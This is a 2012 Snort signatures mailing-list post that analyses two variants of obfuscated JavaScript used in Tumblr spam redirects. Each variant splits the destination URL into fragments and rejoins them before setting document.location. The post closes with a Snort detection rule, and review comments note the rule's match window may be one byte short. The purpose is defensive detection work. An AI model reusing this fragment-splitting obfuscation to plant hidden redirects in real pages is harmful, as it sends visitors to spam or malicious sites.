
Tumblr redirect update


From: James Lay <jlay () slave-tothe-box net>
Date: Fri, 06 Jul 2012 09:30:12 -0600

Team,

The bad guys have added an additional method for this redirect. For reference, the 
previous version was:
// Sample 1: the earlier variant of the Tumblr spam redirect, as posted to the
// list. The destination URL is cut into short string fragments that are glued
// back together through throw-away concatenation helpers, so the full URL never
// appears contiguously in the page source. Every helper here (vfti, izhm,
// rgjdww, wlwq, zmkh) does the same thing: return its first argument followed
// by its second. The identifiers are random filler and carry no meaning.
var yvkq='http'; var gql='://e'; function vfti(hzo,dpq){return hzo+dpq} 
var ojty=vfti(yvkq,gql);var ujh='card'; var rgl='5-l'; function 
izhm(nac,rww){return nac+rww} var imqv=izhm(ujh,rgl);var fyy='ove'; var 
qptv='r.c'; function rgjdww(zsb,uqi){return zsb+uqi} var 
eavjam=rgjdww(fyy,qptv);var uqv='om/?'; var cew='EUKM'; function 
wlwq(vzm,deb){return vzm+deb} var uelj=wlwq(uqv,cew);var cozw='lNO'; var 
gpp='R'; function zmkh(vkj,mov){return vkj+mov} var peqo=zmkh(cozw,gpp); 
// The five partial results reassemble to hxxp://ecard5-lover[.]com/?EUKMlNOR
// (defanged; derived from the fragments above). Assigning that string to
// document.location navigates the browser to it. Detection note: the only
// stable text in this sample is the quoted fragment beginning "='htt" with
// "://" a few bytes later -- everything else is a random identifier.
var bzsd=ojty+imqv+eavjam+uelj+peqo; document.location = bzsd

and the new version:
// Sample 2: the newer variant. Same construction as the earlier sample -- the
// URL is split into fragments and rejoined through single-use concatenation
// helpers -- but the split points have moved ("htt" + "p://" instead of
// "http" + "://e") and the last helper (frmy) now joins three fragments
// instead of two. All identifiers are random filler.
var bwl='htt'; var jwu='p://'; function relz(dgk,cpy){return dgk+cpy} 
var bgbr=relz(bwl,jwu);var daih='ecar'; var zpd='d3-'; function 
eettgr(xyl,too){return xyl+too} var sdiocl=eettgr(daih,zpd);var 
xand='love'; var max='r.co'; function sccfhz(krs,mre){return krs+mre} 
var abbghb=sccfhz(xand,max);var khd='m/?5'; var esd='Mzo'; var 
zcl='GyEy'; function frmy(jxx,sbe,onn){return jxx+sbe+onn} var 
qpyj=frmy(khd,esd,zcl); var otoa=bgbr+sdiocl+abbghb+qpyj; 
// The four partial results reassemble to hxxp://ecard3-lover[.]com/?5MzoGyEy
// (defanged; derived from the fragments above), and the assignment to
// document.location performs the redirect. As in sample 1, the quoted "='htt"
// fragment followed shortly by "://" is the stable pattern to key on.
document.location = otoa

The Snort sig below should match both the previous method and the new one:
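# Tumblr spam redirect: the landing page builds the destination URL from short
# string fragments and assigns the result to document.location. Both variants
# in this thread contain a quoted fragment beginning "='htt" with "://" a few
# bytes later, so those two contents are matched in order inside the HTTP
# response body (file_data) regardless of the random variable names.
# Changes from the posted rule: "reference:" needs a system name before the
# value ("url," here) or the rule fails to parse; "established" is added to
# the flow check so only completed sessions are inspected.
# NOTE(review): in both samples as printed in this thread, "://" ends 16 bytes
# after the end of "='htt" (closing quote, "; var ", a three-letter name and
# "='" or "='p" lie between), so a within:15 window looks one byte short for
# them as shown -- confirm against a raw capture and widen the window if the
# rule does not fire.
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-CLIENT Tumblr spam redirect"; flow:from_server,established; file_data; content:"='htt"; content:"://"; within:15; metadata:policy security-ips drop, service http; classtype:bad-unknown; sid:XXXXXXX; reference:url,malwareandmore.blogspot.com/2012/06/tumblr-redirects.html; rev:2;)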

Thank you.

James

_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!

